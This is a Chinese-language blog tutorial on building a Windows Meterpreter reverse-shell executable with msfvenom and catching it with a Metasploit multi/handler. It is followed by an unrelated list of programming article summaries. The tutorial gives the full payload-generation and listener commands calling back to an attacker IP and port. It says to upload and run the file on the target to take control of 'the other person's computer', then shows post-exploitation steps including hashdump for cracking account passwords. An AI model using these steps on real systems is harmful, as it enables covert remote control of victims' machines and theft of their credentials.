2. 程式人生 > WINDOWS開發 >msfvenom的shell在windows中的使用

msfvenom的shell在windows中的使用

阿新 發佈:2020-06-10

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe

輸入命令:

msfconsole

metasploit偵聽

技術分享圖片 
msf > use exploit/multi/handler     #載入模組
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #設定payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 上面的ip   #設定kali的ip
lhost => 123.123.123.123
msf exploit(multi/handler) > set lport 上面的埠   #設定kali的埠
lport => 2222
msf exploit(multi/handler) > exploit   #執行
[*] Started reverse TCP handler on 123.123.123.123:2222
技術分享圖片

將生成的shell上傳至windows主機中並執行

提示有返回即可控制對方電腦,如同操作linux伺服器一樣

技術分享圖片

kill 後面跟shell端的程序id,如果加-s會結束該會話的程序

ifconfig和ipconfig 看ip

sysinfo 看系統資訊

技術分享圖片

ps 看程序(能看到shell.exe程序)

技術分享圖片

hashdump 可以dump出賬號口令的hash欄位,拿去cmd5解,這裡是為空

技術分享圖片

參考:

metasploit、msfvenom生成木馬入侵電腦及手機 - 秋夜雨巷 - 部落格園

相關推薦

在Flutter嵌入Native元件的解決方案

摘要:在漫長的從Native向Flutter過渡的混合工程時期,要想平滑地過渡,在Flutter使用Native較為完善的控制元件會是一個很好的選擇。本文希望向大家介紹AndroidView的使用方式以及在此基礎之上拓展的雙端嵌入Nat

總結:iOS多執行緒的經典崩潰

前言 iOS崩潰是讓iOS開發人員比較頭痛的事情,app崩潰了,說明程式碼寫的有問題,這時如何快速定位到崩潰的地方很重要。除錯階段是比較容易找到出問題的地方的,但是已經上線的app並分析崩潰報告就比較麻煩了。

深入理解iOS開發的鎖

摘要 本文的目的不是介紹 iOS 各種鎖如何使用,一方面筆者沒有大量的實戰經驗,另一方面這樣的文章相當多,比如 iOS保證執行緒安全的幾種方式與效能對比、iOS 常見知識點(三):Lock。本文也不會詳細介紹鎖的具

在 SwiftUI 構建服務端驅動的 UI 元件

原文地址:Build a Server-Driven UI Using UI Components in SwiftUI 原文作者:Anup Ammanavar 譯文出自:掘金翻譯計劃

iOS的網路除錯

開發iOS的過程,有一件非常令人頭疼的事,那就是網路請求的除錯,無論是後端介面的問題,或是引數結構問題,你總需要一個網路除錯的工具來簡化除錯步驟。

Realm使用碰到的問題(坑)及解決方案

最近做個專案是需要大量的本地資料互動儲存持久化操作,由於是新專案所以我們打算使用比較新穎的框架來進行開發,最後經過篩選使用了Realm來作為本地資料操作框架。name我們為什麼選擇realm呢?大部分的資料庫框架

如何在模組化/元件化專案實現 ObjC-Swift 混編?

本文首發於: ShannonChenCHN/ASwiftTour 原始碼地址:ShannonChenCHN/ASwiftTour 關鍵詞:模組化/元件化、ObjC-Swift 混編、Swift 靜態庫、ABI Stability、Module Stability、LLVM Module、Umbrella Header

在 GPUImage 檢測人臉關鍵點

在相機應用,實時貼紙、實時瘦臉是比較常見的功能,它們的實現基礎是人臉關鍵點檢測。本文主要介紹,如何在 GPUImage 檢測人臉關鍵點。

Widget 的 State 解析

StatefulWidget 應對有互動、需要動態變化視覺效果的場景 StatelessWidget 則用於處理靜態的、無狀態的檢視展示

iOS 跨頁面狀態同步方案比較

由於團隊希望專案能夠去 CoreData 化,而以往狀態同步都是依賴於 CoreData 的 NSFetchedResultsController。因此去 CoreData 則必須尋找一種替代方案來進行狀態同步。

iOS-Swift初級知識-回撥函式in的意思

Alamofire.request(\"https://api.openweathermap.org/xxx\").responseJSON { response in //xxx } 複製程式碼

Kafka失效副本與ISR伸縮流程

何為失效副本? 失效副本的失效包括功能失效和同步失效。 其中,同步失效主要與配置引數replica.lag.time.max.ms 以及副本同步引數lastCaughtUpTimeMs 有關。同步失效的副本會被踢出ISR集合。

B+樹與InnoDB索引詳解

什麼是索引 索引是對資料庫表一列或多列的值進行排序的一種結構,使用索引可快速訪問資料庫表的特定資訊。

Java程式常用的四種執行緒池示例

在Java使用執行緒池,可以用ThreadPoolExecutor的建構函式直接創建出執行緒池例項,如何使用參見之前的文章Java執行緒池構造引數詳解。不過,在Executors類,為我們提供了常用執行緒池的建立方法。接下來我們就來

透過面試題掌握Redis【持續更新

最近是把《Redis設計與實現》看完了,然後也對每一章寫了讀書筆記。但是總感覺自己掌握得不夠,所以就在網上搜集了一些Redis相關的面試題,然後自己去翻筆記,看書,查資料嘗試著去解答,目前這篇文章還沒有完全覆蓋

Shell在程式碼重構的應用瞭解下

程式碼重構(Code refactoring)有時是很枯燥的,字串替換之類的操作不僅乏味,而且還容易出錯,好在有一些工具可用,以PHP為例,如:Rephactor,Scisr等等,不過現成的工具往往意味著不夠靈活,所以今天我要說說S

SQLjoin的各種用法

SQL join 用於把來自兩個或多個表的行結合起來。 下圖展示了 LEFT JOIN、RIGHT JOIN、INNER JOIN、OUTER JOIN 相關的 7 種用法。

Django的CBV

CBV模式的介面 CBV模式即為API式的寫法,一個資源類接受一系列的請求。本文討論的是View的直接子類的概念和方法,Django REST framework重寫和添加了大量的方法,可以直接繼承自XXXAPIView,不再本文的討論範圍。

Java 基於各種資料型別分析 == 和 equals 的區別

前言分析一、int 和 Integer1、Integer 物件使用 new 關鍵字生成2、表面上不是 new 關鍵字生成的 Integer 物件3、兩個 int 變數比較4、new 生成的 Integer 物件和 int 變數比較5、非 new 生成的 Integer 物件和 int

Java 方法區與常量池

前言正文全域性字串池(string pool也有叫做string literal pool)class 檔案常量池(class constant pool)執行時常量池(runtime constant pool)三種常量池之間的關聯總結參考連結